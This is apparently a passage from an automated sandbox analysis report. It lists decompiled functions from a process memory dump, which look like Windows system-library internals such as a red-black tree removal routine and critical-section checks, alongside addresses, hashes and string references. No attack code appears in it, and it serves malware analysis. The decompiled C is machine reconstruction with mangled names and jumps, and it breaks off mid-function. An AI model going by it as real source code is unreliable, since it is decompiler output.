0x019f1c12
0x019f1c15
0x019f1c1b
0x019f1c1f
0x019f1c31
0x019f1c33
0x01a47026
0x01a47026
0x019f1c21
0x019f1c24
0x019f1c24
0x019f1bee
0x019f1bee
0x019f1bf2
0x019f1c3a
0x019f1bf4
0x019f1bf4
0x019f1c05
0x019f1c05
0x019f1c09
0x019f1c3e
0x00000000
0x00000000
0x00000000
0x019f1c09
0x019f1bec
0x019f1be0
0x019f1bae
0x019f1c2e

Strings

WindowsExcludedProcs, xrefs: 019F1BC5

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: 70a78325d8bf54f9bf7612c4f6780587cf4778176bea3919747447d16e22167f
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: 0221C877901169FBDB229A99C940F5BBB6DEF85A61F054839FF08DB200D631DD0097E0

Uniqueness

Uniqueness Score: -1.00%

Function 01A0F716, Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01A0F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x01a0f71d
0x01a0f722
0x01a0f726
0x01a54770
0x01a0f765
0x01a0f769
0x01a0f769
0x01a0f732
0x01a5477a
0x00000000
0x01a5477a
0x01a0f738
0x01a0f73a
0x01a0f73c
0x01a0f73f
0x01a0f746
0x01a0f778
0x01a0f7a9
0x01a0f7a9
0x01a0f754
0x01a0f75a
0x01a0f75d
0x01a0f75f
0x01a0f761
0x01a0f76f
0x01a0f771
0x01a0f771
0x01a0f76f
0x01a0f763
0x00000000
0x01a0f763
0x01a0f77d
0x01a0f7a3
0x01a0f7a5
0x00000000
0x01a0f7a5
0x01a0f77f
0x01a0f782
0x01a0f784
0x01a0f786
0x00000000
0x00000000
0x00000000
0x01a0f788
0x01a0f748
0x01a0f74d
0x01a0f78d
0x01a0f793
0x01a0f7b7
0x01a0f7bc
0x00000000
0x01a0f7bc
0x01a0f798
0x00000000
0x00000000
0x01a0f79d
0x01a0f7b0
0x00000000
0x01a0f7b0
0x01a0f79f
0x00000000
0x01a0f74f
0x01a0f74f
0x00000000
0x01a0f74f

Strings

Actx , xrefs: 01A0F73F

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 9640d37a8f90d8751e18d85b2735007532fd47f18e25b08b757afa726f47aaf3
Instruction ID: 53e792a43c3cc926d2664af11e5af1bb6a18f57fe72d44819f6482bb60f2f8c6
Opcode Fuzzy Hash: 9640d37a8f90d8751e18d85b2735007532fd47f18e25b08b757afa726f47aaf3
Instruction Fuzzy Hash: 4611B635B047028FF7378F1DA89073676A5AB95724F29452AE565EB3D1D7B0C8418343

Uniqueness

Uniqueness Score: -1.00%

Function 01A98DF1, Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E01A98DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x1ac0d50);
				E01A3D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E01A75720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L01A3DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L01A3DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E01A3D130(_t34, _t39, _t40);
			}

0x01a98df1
0x01a98df1
0x01a98df1
0x01a98df1
0x01a98df1
0x01a98df1
0x01a98df3
0x01a98df8
0x01a98dfd
0x01a98e00
0x01a98e0e
0x01a98e2a
0x01a98e36
0x01a98e38
0x01a98e3c
0x01a98e46
0x01a98e46
0x01a98e36
0x01a98e50
0x01a98e56
0x01a98e59
0x01a98e5c
0x01a98e60
0x01a98e67
0x01a98e6d
0x01a98e73
0x01a98e74
0x01a98eb1
0x01a98ebd

Strings

Critical error detected %lx, xrefs: 01A98E21

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: 361b4c80547cd4bb6ac418f0ed0a89d30049218a7cfa70faa88153b5528abb56
Instruction ID: fdf18a3de73adbb2064878c3019c366109e2eb8b784f35cd520186e7b343e6e6
Opcode Fuzzy Hash: 361b4c80547cd4bb6ac418f0ed0a89d30049218a7cfa70faa88153b5528abb56
Instruction Fuzzy Hash: 6A1187B5D00348EBDF25CFB88A0579CBBF0BB05711F24821EE129AB282C3384602CF14

Uniqueness

Uniqueness Score: -1.00%

Function 01A7FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 01A7FF60

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: 648cc606d306ffa1610e0722f0ddf22af3fc015c947023466e32a239ff06e832
Instruction ID: 47a5a898f8cbf37bdb03fbb0be1853d522bf89cacff0a9028f8d5e74ac5a816c
Opcode Fuzzy Hash: 648cc606d306ffa1610e0722f0ddf22af3fc015c947023466e32a239ff06e832
Instruction Fuzzy Hash: 11112675910644EFDB26DF94CE48F98BBB1FF45714F548044F10967161CB399B40CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 019EF900, Relevance: .9, Instructions: 863
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E019EF900(signed int _a4, signed int _a8) {
				signed char _v5;
				signed char _v6;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed char _t285;
				signed int _t289;
				signed char _t292;
				signed int _t293;
				signed char _t295;
				signed int _t300;
				signed int _t301;
				signed char _t306;
				signed char _t307;
				signed char _t308;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed char _t314;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t322;
				signed int _t323;
				signed int _t328;
				signed char _t329;
				signed int _t337;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				signed int _t348;
				signed char _t350;
				signed int _t351;
				signed char _t353;
				signed char _t356;
				signed int _t357;
				signed char _t359;
				signed int _t360;
				signed char _t363;
				signed int _t364;
				signed int _t366;
				signed int* _t372;
				signed char _t373;
				signed char _t378;
				signed int _t379;
				signed int* _t382;
				signed int _t383;
				signed char _t385;
				signed int _t387;
				signed int _t388;
				signed char _t390;
				signed int _t393;
				signed int _t395;
				signed char _t397;
				signed int _t401;
				signed int _t405;
				signed int _t407;
				signed int _t409;
				signed int _t410;
				signed int _t413;
				signed char _t415;
				signed int _t416;
				signed char _t418;
				signed int _t419;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed char* _t425;
				signed char _t426;
				signed char _t427;
				signed int _t428;
				signed int _t429;
				signed int _t431;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t452;
				signed int _t454;
				signed int _t455;
				signed int _t456;
				signed int _t457;
				signed int _t461;
				signed int _t462;
				signed int _t464;
				signed int _t467;
				signed int _t470;
				signed int _t474;
				signed int _t475;
				signed int _t477;
				signed int _t481;
				signed int _t483;
				signed int _t486;
				signed int _t487;
				signed int _t488;

				_t285 =  *(_a4 + 4);
				_t444 = _a8;
				_t452 =  *_t444;
				_t421 = _t285 & 1;
				if(_t421 != 0) {
					if(_t452 != 0) {
						_t452 = _t452 ^ _t444;
					}
				}
				_t393 =  *(_t444 + 4);
				if(_t421 != 0) {
					if(_t393 != 0) {
						_t393 = _t393 ^ _t444;
					}
				}
				_t426 = _t393;
				if(_t452 != 0) {
					_t426 = _t452;
				}
				_v5 = _t285 & 0x00000001;
				asm("sbb eax, eax");
				if((_t393 &  ~_t452) != 0) {
					_t289 = _t393;
					_t427 = _v5;
					_t422 = _t393;
					_v12 = _t393;
					_v16 = 1;
					if( *_t393 != 0) {
						_v16 = _v16 & 0x00000000;
						_t445 =  *_t393;
						goto L115;
						L116:
						_t289 = _t445;
						L117:
						_t445 =  *_t289;
						if(_t445 != 0) {
							L115:
							_t422 = _t289;
							if(_t427 != 0) {
								goto L183;
							}
							goto L116;
						} else {
							_t444 = _a8;
							_v12 = _t289;
							goto L27;
						}
						L183:
						if(_t445 == 0) {
							goto L116;
						}
						_t289 = _t289 ^ _t445;
						goto L117;
					}
					L27:
					if(_t427 != 0) {
						if(_t452 == 0) {
							goto L28;
						}
						_t428 = _t289 ^ _t452;
						L29:
						 *_t289 = _t428;
						_t429 =  *(_t452 + 8);
						_v20 = _t429;
						_t426 = _t429 & 0xfffffffc;
						_t292 =  *(_a4 + 4) & 0x00000001;
						_v6 = _t292;
						_t293 = _v12;
						if(_t292 != 0) {
							if(_t426 != 0) {
								_t426 = _t426 ^ _t452;
							}
						}
						if(_t426 != _t444) {
							L174:
							_t423 = 0x1d;
							asm("int 0x29");
							goto L175;
						} else {
							_t436 = _t293;
							if(_v6 != 0) {
								_t436 = _t436 ^ _t452;
							}
							_v20 = _v20 & 0x00000003;
							_v20 = _v20 | _t436;
							 *(_t452 + 8) = _v20;
							_t426 =  *(_t393 + 8) & 0xfffffffc;
							_t356 =  *(_a4 + 4) & 0x00000001;
							_v6 = _t356;
							_t357 = _v12;
							if(_t356 != 0) {
								if(_t426 != 0) {
									_t426 = _t426 ^ _t393;
								}
							}
							if(_t426 != _t444) {
								goto L174;
							} else {
								_t483 = _t393 ^ _t357;
								_v24 = _t483;
								if(_v6 == 0) {
									_v24 = _t357;
								}
								 *(_t393 + 8) =  *(_t393 + 8) & 0x00000003 | _v24;
								_t426 =  *(_t357 + 4);
								_t444 = _a8;
								_t359 =  *(_a4 + 4) & 0x00000001;
								_v6 = _t359;
								_t360 = _v12;
								_v24 = _t483;
								if(_t359 != 0) {
									_v24 = _t483;
									if(_t426 == 0) {
										goto L37;
									}
									_t426 = _t426 ^ _t360;
									L38:
									if(_v6 == 0) {
										_t483 = _t393;
									}
									_t413 =  *(_t360 + 8);
									 *(_t360 + 4) = _t483;
									_t452 = _t413 & 0xfffffffc;
									_v5 = _t413;
									_t363 =  *(_a4 + 4) & 0x00000001;
									_v6 = _t363;
									if(_t363 != 0) {
										_t364 = _v12;
										_v5 = _t413;
										if(_t452 == 0) {
											goto L41;
										}
										_v20 = _t452;
										_v20 = _v20 ^ _t364;
										L42:
										if(_v20 != _t422) {
											_v5 = _t413;
											if(_v6 == 0) {
												L199:
												_t366 = _v12;
												L200:
												if(_t452 != 0 || _t366 != _t422) {
													goto L174;
												} else {
													goto L43;
												}
											}
											_t366 = _v12;
											_v5 = _t413;
											if(_t452 == 0) {
												goto L199;
											}
											_t452 = _t452 ^ _t366;
											goto L200;
										}
										L43:
										_t486 =  *(_t444 + 8) & 0xfffffffc;
										if(_v6 != 0) {
											if(_t486 != 0) {
												_t486 = _t486 ^ _t444;
											}
											if(_v6 != 0 && _t486 != 0) {
												_t486 = _t486 ^ _t366;
											}
										}
										_t415 = _t413 & 0x00000003 | _t486;
										 *(_t366 + 8) = _t415;
										_t416 = _v12;
										 *(_t416 + 8) = ( *(_t444 + 8) ^ _t415) & 0x00000001 ^ _t415;
										_t452 =  *(_t444 + 8);
										_t372 = _a4;
										if((_t452 & 0xfffffffc) == 0) {
											if( *_t372 != _t444) {
												goto L174;
											} else {
												 *_t372 = _t416;
												goto L52;
											}
										} else {
											_t452 = _t452 & 0xfffffffc;
											_t378 = _t372[1] & 0x00000001;
											_v6 = _t378;
											if(_t378 != 0) {
												if(_t452 != 0) {
													_t452 = _t452 ^ _t444;
												}
											}
											_t379 =  *(_t452 + 4);
											if(_v6 != 0) {
												if(_t379 != 0) {
													_t379 = _t379 ^ _t452;
												}
											}
											_v24 = _t379;
											_t382 = _t452 + (0 | _v24 == _t444) * 4;
											_v28 = _t382;
											_t383 =  *_t382;
											if(_v6 != 0) {
												if(_t383 != 0) {
													_t383 = _t383 ^ _t452;
												}
											}
											if(_t383 != _t444) {
												goto L174;
											} else {
												if(_v6 != 0) {
													_t487 = _t452 ^ _t416;
												} else {
													_t487 = _t416;
												}
												 *_v28 = _t487;
												L52:
												_t373 = _v5;
												L12:
												_t452 = _a4;
												_v5 = _t373 & 0x00000001;
												if(( *(_t452 + 4) & 0x00000001) != 0) {
													if(_t426 == 0) {
														goto L13;
													}
													_t306 = _t422 ^ _t426;
													L14:
													_t444 = _v16;
													 *(_t422 + _t444 * 4) = _t306;
													if(_t426 != 0) {
														_t306 =  *(_t426 + 8) & 0xfffffffc;
														_t418 =  *(_t452 + 4) & 0x00000001;
														_v6 = _t418;
														_t419 = _v12;
														if(_t418 != 0) {
															if(_t306 != 0) {
																_t306 = _t306 ^ _t426;
															}
														}
														if(_t306 != _t419) {
															goto L174;
														} else {
															if(_v6 != 0) {
																if(_t422 != 0) {
																	_t422 = _t422 ^ _t426;
																}
															}
															 *(_t426 + 8) = _t422;
															L24:
															return _t306;
														}
													}
													if(_v5 != _t426) {
														goto L24;
													} else {
														_t395 = _t452;
														_t306 =  *(_t395 + 4);
														L17:
														_t446 = _t423;
														_t434 = _v16 ^ 0x00000001;
														_v24 = _t446;
														_v12 = _t434;
														_t452 =  *(_t423 + _t434 * 4);
														if((_t306 & 0x00000001) != 0) {
															if(_t452 == 0) {
																goto L18;
															}
															_t426 = _t452 ^ _t446;
															L19:
															if(( *(_t426 + 8) & 0x00000001) != 0) {
																_t310 =  *(_t426 + 8) & 0xfffffffc;
																_t444 = _t306 & 1;
																if(_t444 != 0) {
																	if(_t310 != 0) {
																		_t310 = _t310 ^ _t426;
																	}
																}
																if(_t310 != _t423) {
																	goto L174;
																} else {
																	if(_t444 != 0) {
																		if(_t452 != 0) {
																			_t452 = _t452 ^ _t423;
																		}
																	}
																	if(_t452 != _t426) {
																		goto L174;
																	} else {
																		_t452 =  *(_t423 + 8) & 0xfffffffc;
																		if(_t444 != 0) {
																			if(_t452 == 0) {
																				L170:
																				if( *_t395 != _t423) {
																					goto L174;
																				} else {
																					 *_t395 = _t426;
																					L140:
																					if(_t444 != 0) {
																						if(_t452 != 0) {
																							_t452 = _t452 ^ _t426;
																						}
																					}
																					 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t452;
																					_t300 =  *(_t426 + _v16 * 4);
																					if(_t444 != 0) {
																						if(_t300 == 0) {
																							goto L143;
																						}
																						_t300 = _t300 ^ _t426;
																						goto L142;
																					} else {
																						L142:
																						if(_t300 != 0) {
																							_t401 =  *(_t300 + 8);
																							_t452 = _t401 & 0xfffffffc;
																							if(_t444 != 0) {
																								if(_t452 != 0) {
																									_t452 = _t452 ^ _t300;
																								}
																							}
																							if(_t452 != _t426) {
																								goto L174;
																							} else {
																								if(_t444 != 0) {
																									_t481 = _t300 ^ _t423;
																								} else {
																									_t481 = _t423;
																								}
																								 *(_t300 + 8) = _t401 & 0x00000003 | _t481;
																								goto L143;
																							}
																						}
																						L143:
																						if(_t444 != 0) {
																							if(_t300 != 0) {
																								_t300 = _t300 ^ _t423;
																							}
																						}
																						 *(_t423 + _v12 * 4) = _t300;
																						_t454 = _t426;
																						if(_t444 != 0) {
																							_t455 = _t454 ^ _t423;
																							_t301 = _t455;
																						} else {
																							_t301 = _t423;
																							_t455 = _t454 ^ _t301;
																						}
																						 *(_t426 + _v16 * 4) = _t301;
																						_t395 = _a4;
																						if(_t444 == 0) {
																							_t455 = _t426;
																						}
																						 *(_t423 + 8) =  *(_t423 + 8) & 0x00000003 | _t455;
																						 *(_t426 + 8) =  *(_t426 + 8) & 0x000000fe;
																						 *(_t423 + 8) =  *(_t423 + 8) | 0x00000001;
																						_t426 =  *(_t423 + _v12 * 4);
																						_t306 =  *(_t395 + 4);
																						if((_t306 & 0x00000001) != 0) {
																							if(_t426 != 0) {
																								_t426 = _t426 ^ _t423;
																							}
																						}
																						_t446 = _v24;
																						goto L20;
																					}
																				}
																			}
																			_t452 = _t452 ^ _t423;
																		}
																		if(_t452 == 0) {
																			goto L170;
																		}
																		_t311 =  *(_t452 + 4);
																		if(_t444 != 0) {
																			if(_t311 != 0) {
																				_t311 = _t311 ^ _t452;
																			}
																		}
																		if(_t311 == _t423) {
																			if(_t444 != 0) {
																				L175:
																				_t295 = _t452 ^ _t426;
																				goto L169;
																			} else {
																				_t295 = _t426;
																				L169:
																				 *(_t452 + 4) = _t295;
																				goto L140;
																			}
																		} else {
																			_t312 =  *_t452;
																			if(_t444 != 0) {
																				if(_t312 != 0) {
																					_t312 = _t312 ^ _t452;
																				}
																			}
																			if(_t312 != _t423) {
																				goto L174;
																			} else {
																				if(_t444 != 0) {
																					_t314 = _t452 ^ _t426;
																				} else {
																					_t314 = _t426;
																				}
																				 *_t452 = _t314;
																				goto L140;
																			}
																		}
																	}
																}
															}
															L20:
															_t456 =  *_t426;
															_t307 = _t306 & 0x00000001;
															if(_t456 != 0) {
																if(_t307 != 0) {
																	_t456 = _t456 ^ _t426;
																}
																if(( *(_t456 + 8) & 0x00000001) == 0) {
																	goto L21;
																} else {
																	L56:
																	_t461 =  *(_t426 + _v12 * 4);
																	if(_t307 != 0) {
																		if(_t461 == 0) {
																			L59:
																			_t462 = _v16;
																			_t444 =  *(_t426 + _t462 * 4);
																			if(_t307 != 0) {
																				if(_t444 != 0) {
																					_t444 = _t444 ^ _t426;
																				}
																			}
																			 *(_t444 + 8) =  *(_t444 + 8) & 0x000000fe;
																			_t452 = _t462 ^ 0x00000001;
																			_t405 =  *(_t395 + 4) & 1;
																			_t316 =  *(_t444 + 8) & 0xfffffffc;
																			_v28 = _t405;
																			_v24 = _t452;
																			if(_t405 != 0) {
																				if(_t316 != 0) {
																					_t316 = _t316 ^ _t444;
																				}
																			}
																			if(_t316 != _t426) {
																				goto L174;
																			} else {
																				_t318 = _t452 ^ 0x00000001;
																				_v32 = _t318;
																				_t319 =  *(_t426 + _t318 * 4);
																				if(_t405 != 0) {
																					if(_t319 != 0) {
																						_t319 = _t319 ^ _t426;
																					}
																				}
																				if(_t319 != _t444) {
																					goto L174;
																				} else {
																					_t320 =  *(_t423 + _t452 * 4);
																					if(_t405 != 0) {
																						if(_t320 != 0) {
																							_t320 = _t320 ^ _t423;
																						}
																					}
																					if(_t320 != _t426) {
																						goto L174;
																					} else {
																						_t322 =  *(_t426 + 8) & 0xfffffffc;
																						if(_t405 != 0) {
																							if(_t322 != 0) {
																								_t322 = _t322 ^ _t426;
																							}
																						}
																						if(_t322 != _t423) {
																							goto L174;
																						} else {
																							_t464 = _t423 ^ _t444;
																							_t323 = _t464;
																							if(_t405 == 0) {
																								_t323 = _t444;
																							}
																							 *(_t423 + _v24 * 4) = _t323;
																							_t407 = _v28;
																							if(_t407 != 0) {
																								if(_t423 != 0) {
																									L72:
																									 *(_t444 + 8) =  *(_t444 + 8) & 0x00000003 | _t464;
																									_t328 =  *(_t444 + _v24 * 4);
																									if(_t407 != 0) {
																										if(_t328 == 0) {
																											L74:
																											if(_t407 != 0) {
																												if(_t328 != 0) {
																													_t328 = _t328 ^ _t426;
																												}
																											}
																											 *(_t426 + _v32 * 4) = _t328;
																											_t467 = _t426 ^ _t444;
																											_t329 = _t467;
																											if(_t407 == 0) {
																												_t329 = _t426;
																											}
																											 *(_t444 + _v24 * 4) = _t329;
																											if(_v28 == 0) {
																												_t467 = _t444;
																											}
																											_t395 = _a4;
																											_t452 = _t426;
																											 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t467;
																											_t426 = _t444;
																											L80:
																											 *(_t426 + 8) =  *(_t426 + 8) ^ ( *(_t426 + 8) ^  *(_t423 + 8)) & 0x00000001;
																											 *(_t423 + 8) =  *(_t423 + 8) & 0x000000fe;
																											 *(_t452 + 8) =  *(_t452 + 8) & 0x000000fe;
																											_t337 =  *(_t426 + 8) & 0xfffffffc;
																											_t444 =  *(_t395 + 4) & 1;
																											if(_t444 != 0) {
																												if(_t337 != 0) {
																													_t337 = _t337 ^ _t426;
																												}
																											}
																											if(_t337 != _t423) {
																												goto L174;
																											} else {
																												_t339 =  *(_t423 + _v12 * 4);
																												if(_t444 != 0) {
																													if(_t339 != 0) {
																														_t339 = _t339 ^ _t423;
																													}
																												}
																												if(_t339 != _t426) {
																													goto L174;
																												} else {
																													_t452 =  *(_t423 + 8) & 0xfffffffc;
																													if(_t444 != 0) {
																														if(_t452 == 0) {
																															L160:
																															if( *_t395 != _t423) {
																																goto L174;
																															} else {
																																 *_t395 = _t426;
																																L93:
																																if(_t444 != 0) {
																																	if(_t452 != 0) {
																																		_t452 = _t452 ^ _t426;
																																	}
																																}
																																_t409 = _v16;
																																 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t452;
																																_t343 =  *(_t426 + _t409 * 4);
																																if(_t444 != 0) {
																																	if(_t343 == 0) {
																																		goto L96;
																																	}
																																	_t343 = _t343 ^ _t426;
																																	goto L95;
																																} else {
																																	L95:
																																	if(_t343 != 0) {
																																		_t410 =  *(_t343 + 8);
																																		_t452 = _t410 & 0xfffffffc;
																																		if(_t444 != 0) {
																																			if(_t452 != 0) {
																																				_t452 = _t452 ^ _t343;
																																			}
																																		}
																																		if(_t452 != _t426) {
																																			goto L174;
																																		} else {
																																			if(_t444 != 0) {
																																				_t474 = _t343 ^ _t423;
																																			} else {
																																				_t474 = _t423;
																																			}
																																			 *(_t343 + 8) = _t410 & 0x00000003 | _t474;
																																			_t409 = _v16;
																																			goto L96;
																																		}
																																	}
																																	L96:
																																	if(_t444 != 0) {
																																		if(_t343 != 0) {
																																			_t343 = _t343 ^ _t423;
																																		}
																																	}
																																	 *(_t423 + _v12 * 4) = _t343;
																																	if(_t444 != 0) {
																																		_t345 = _t426 ^ _t423;
																																		_t470 = _t345;
																																	} else {
																																		_t345 = _t423;
																																		_t470 = _t426 ^ _t345;
																																	}
																																	 *(_t426 + _t409 * 4) = _t345;
																																	if(_t444 == 0) {
																																		_t470 = _t426;
																																	}
																																	_t306 =  *(_t423 + 8) & 0x00000003 | _t470;
																																	 *(_t423 + 8) = _t306;
																																	goto L24;
																																}
																															}
																														}
																														_t452 = _t452 ^ _t423;
																													}
																													if(_t452 == 0) {
																														goto L160;
																													}
																													_t348 =  *(_t452 + 4);
																													if(_t444 != 0) {
																														if(_t348 != 0) {
																															_t348 = _t348 ^ _t452;
																														}
																													}
																													if(_t348 == _t423) {
																														if(_t444 != 0) {
																															_t350 = _t452 ^ _t426;
																														} else {
																															_t350 = _t426;
																														}
																														 *(_t452 + 4) = _t350;
																														goto L93;
																													} else {
																														_t351 =  *_t452;
																														if(_t444 != 0) {
																															if(_t351 != 0) {
																																_t351 = _t351 ^ _t452;
																															}
																														}
																														if(_t351 != _t423) {
																															goto L174;
																														} else {
																															if(_t444 != 0) {
																																_t353 = _t452 ^ _t426;
																															} else {
																																_t353 = _t426;
																															}
																															 *_t452 = _t353;
																															goto L93;
																														}
																													}
																												}
																											}
																										}
																										_t328 = _t328 ^ _t444;
																									}
																									if(_t328 != 0) {
																										_t475 =  *(_t328 + 8);
																										_v20 = _t475;
																										_t452 = _t475 & 0xfffffffc;
																										if(_t407 != 0) {
																											if(_t452 != 0) {
																												_t452 = _t452 ^ _t328;
																											}
																										}
																										if(_t452 != _t444) {
																											goto L174;
																										} else {
																											if(_t407 != 0) {
																												_t477 = _t328 ^ _t426;
																											} else {
																												_t477 = _t426;
																											}
																											_v20 = _v20 & 0x00000003;
																											_v20 = _v20 | _t477;
																											 *(_t328 + 8) = _v20;
																											goto L74;
																										}
																									}
																									goto L74;
																								}
																							}
																							_t464 = _t423;
																							goto L72;
																						}
																					}
																				}
																			}
																		}
																		_t452 = _t461 ^ _t426;
																	}
																	if(_t452 == 0 || ( *(_t452 + 8) & 0x00000001) == 0) {
																		goto L59;
																	} else {
																		goto L80;
																	}
																}
															}
															L21:
															_t457 =  *(_t426 + 4);
															if(_t457 != 0) {
																if(_t307 != 0) {
																	_t457 = _t457 ^ _t426;
																}
																if(( *(_t457 + 8) & 0x00000001) == 0) {
																	goto L22;
																} else {
																	goto L56;
																}
															}
															L22:
															_t308 =  *(_t423 + 8);
															if((_t308 & 0x00000001) == 0) {
																 *(_t426 + 8) =  *(_t426 + 8) | 0x00000001;
																_t306 =  *(_t395 + 4);
																_t431 =  *(_t423 + 8) & 0xfffffffc;
																_t397 = _t306 & 0x00000001;
																if(_t397 != 0) {
																	if(_t431 == 0) {
																		goto L110;
																	}
																	_t423 = _t423 ^ _t431;
																	L111:
																	if(_t423 == 0) {
																		goto L24;
																	}
																	_t432 =  *(_t423 + 4);
																	if(_t397 != 0) {
																		if(_t432 != 0) {
																			_t432 = _t432 ^ _t423;
																		}
																	}
																	_v16 = 0 | _t432 == _t446;
																	_t395 = _a4;
																	goto L17;
																}
																L110:
																_t423 = _t431;
																goto L111;
															} else {
																_t306 = _t308 & 0x000000fe;
																 *(_t423 + 8) = _t306;
																 *(_t426 + 8) =  *(_t426 + 8) | 0x00000001;
																goto L24;
															}
														}
														L18:
														_t426 = _t452;
														goto L19;
													}
												}
												L13:
												_t306 = _t426;
												goto L14;
											}
										}
									}
									L41:
									_t366 = _v12;
									_v20 = _t452;
									goto L42;
								}
								L37:
								_t483 = _v24;
								goto L38;
							}
						}
					}
					L28:
					_t428 = _t452;
					goto L29;
				}
				_t385 = _v5;
				_t422 =  *(_t444 + 8) & 0xfffffffc;
				if(_t385 != 0) {
					if(_t422 != 0) {
						_t422 = _t422 ^ _t444;
					}
				}
				_v12 = _t444;
				if(_t422 == 0) {
					if(_t426 != 0) {
						 *(_t426 + 8) =  *(_t426 + 8) & 0x00000000;
					}
					_t425 = _a4;
					if( *_t425 != _t444) {
						goto L174;
					} else {
						_t425[4] = _t426;
						_t306 = _t425[4] & 0x00000001;
						if(_t306 != 0) {
							_t425[4] = _t425[4] | 0x00000001;
						}
						 *_t425 = _t426;
						goto L24;
					}
				} else {
					_t452 =  *(_t422 + 4);
					if(_t385 != 0) {
						if(_t452 != 0) {
							_t452 = _t452 ^ _t422;
						}
					}
					if(_t452 == _t444) {
						_v16 = 1;
						L11:
						_t373 =  *(_t444 + 8);
						goto L12;
					} else {
						_t387 =  *_t422;
						if(_v5 != 0) {
							if(_t387 != 0) {
								_t387 = _t387 ^ _t422;
							}
						}
						if(_t387 != _t444) {
							goto L174;
						} else {
							_t488 = _a4;
							_v16 = _v16 & 0x00000000;
							_t388 =  *(_t488 + 4);
							_v24 = _t388;
							if((_t388 & 0xfffffffe) == _t444) {
								if(_t426 != 0) {
									 *(_t488 + 4) = _t426;
